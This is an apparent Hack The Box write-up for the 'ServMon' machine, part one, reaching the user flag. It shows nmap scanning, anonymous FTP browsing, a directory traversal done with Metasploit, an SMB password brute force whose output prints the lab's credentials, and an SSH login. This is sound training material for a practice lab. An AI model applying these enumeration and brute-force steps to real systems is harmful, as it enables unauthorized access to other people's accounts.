Hack the box-ServMon(Part-1)

Hello All, This is my first write up on the hack the box machine. Which i have solved yesterday and found there are very less articles with the explanation.So i thought i should write about it.

Let’s start with the scanning.Let’s check which ports are open, and the interesting information we get from below nmap command.

nmap -T4 -A 10.10.10.184

Nmap scan report for 10.10.10.184
Host is up (0.27s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01–18–20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
| <html xmlns=”http://www.w3.org/1999/xhtml”>
| <head>
| <title></title>
| <script type=”text/javascript”>
| window.location.href = “Pages/login.htm”;
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn’t have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1045/tcp filtered fpitp
1052/tcp filtered ddt
1100/tcp filtered mctp
1111/tcp filtered lmsocialserver
1175/tcp filtered dossier
1583/tcp filtered simbaexpress
5666/tcp open nrpe?
6699/tcp open napster?
7019/tcp filtered doceri-ctl
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| HTTP/1.1 404
| Content-Length: 28
| found: /staff_picks.html
| obuster/3.0.1
| HTTP/1.1 404
| Content-Length: 25
|_ found: /IEEE_802.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020–01–14T13:24:20
|_Not valid after: 2021–01–13T13:24:20
|_ssl-date: TLS randomness does not represent time

FTP allows anonymous login and there is one directory named “Users”. Lets see what is there inside Users directory by connecting to ftp.

username:anonymous and password:not required

root@kali:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01–18–20 12:05PM <DIR> Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
d125 Data connection already open; Transfer starting.
01–18–20 12:06PM <DIR> Nadine
01–18–20 12:08PM <DIR> Nathan
226 Transfer complete.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01–18–20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.33 secs (0.5150 kB/s)

Lets take a look contents of Confidential.txt file.

Confidential.txt

From this note, we get a hint that Passwords.txt file path is : Users/Nathan/Desktop/Passwords.txt.

Is there any interesting in Nathan folder?Have a look.

ftp> cd Nathan
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01–18–20 12:10PM 186 Notes to do.txt
226 Transfer complete.
ftp> get “Notes to do.txt”

Hmmm…This might be going to be a hint for next steps.Currently proceed with the Confidential.txt

Let’s try directory traversal to get the Passwords.txt. After doing some fuzzing on path i got the results.We can automate this method using tvt_nvms_traversal module of metasploit.

So now what? Tried login into the main page with this credentials but failed.Then where we can use this credentials to get logged in?There is 445 port open in nmap results. So i tried brute-forcing on port 445 using smb_login module of metasploit.

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184
msf5 auxiliary(scanner/smb/smb_login) > ls
[*] exec: ls

20200619112534_default_10.10.10.184_nvms.traversal_676768.txt pass.txt
20200619113802_default_10.10.10.184_nvms.traversal_380409.txt users.txt
msf5 auxiliary(scanner/smb/smb_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE pass.txt
PASS_FILE => pass.txt
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.184:445–10.10.10.184:445 — Starting SMB login bruteforce
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nadine:1nsp3ctTh3Way2Mars!’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nadine:Th3r34r3To0M4nyTrait0r5!’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nadine:B3WithM30r4ga1n5tMe’,
[+] 10.10.10.184:445–10.10.10.184:445 — Success: ‘.\Nadine:L1k3B1gBut7s@W0rk’
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:1nsp3ctTh3Way2Mars!’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:Th3r34r3To0M4nyTrait0r5!’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:B3WithM30r4ga1n5tMe’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:L1k3B1gBut7s@W0rk’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:0nly7h3y0unGWi11F0l10w’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:IfH3s4b0Utg0t0H1sH0me’,
[-] 10.10.10.184:445–10.10.10.184:445 — Failed: ‘.\Nathan:Gr4etN3w5w17hMySk1Pa5’,
[*] 10.10.10.184:445 — Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And finally we get the username and password to login to SSH.

Nadine: L1k3B1gBut7s@W0rk

root@kali:~/Downloads# ssh Nadine@10.10.10.184
Nadine@10.10.10.184’s password:

Microsoft Windows [Version 10.0.18363.752]
© 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of C:\Users\Nadine

08/04/2020 23:16 <DIR> .
08/04/2020 23:16 <DIR> ..
18/01/2020 11:23 <DIR> 3D Objects
18/01/2020 11:23 <DIR> Contacts
08/04/2020 22:28 <DIR> Desktop
08/04/2020 22:28 <DIR> Documents
18/01/2020 11:23 <DIR> Downloads
08/04/2020 22:27 <DIR> Favorites
08/04/2020 22:27 <DIR> Links
18/01/2020 11:23 <DIR> Music
18/01/2020 11:31 <DIR> OneDrive
18/01/2020 11:23 <DIR> Pictures
18/01/2020 11:23 <DIR> Saved Games
18/01/2020 11:23 <DIR> Searches
18/01/2020 11:23 <DIR> Videos
0 File(s) 0 bytes
15 Dir(s) 27,836,751,872 bytes free

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of C:\Users\Nadine\Desktop

08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
20/06/2020 07:30 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,834,671,104 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
Voila! Flag inside user.txt file.

Sorry for lengthy article.I just wanted describe every step so that newbies can understand the reason of every step. Soon i will post for the root flag.

If you like this article please let me know so that i will post more articles.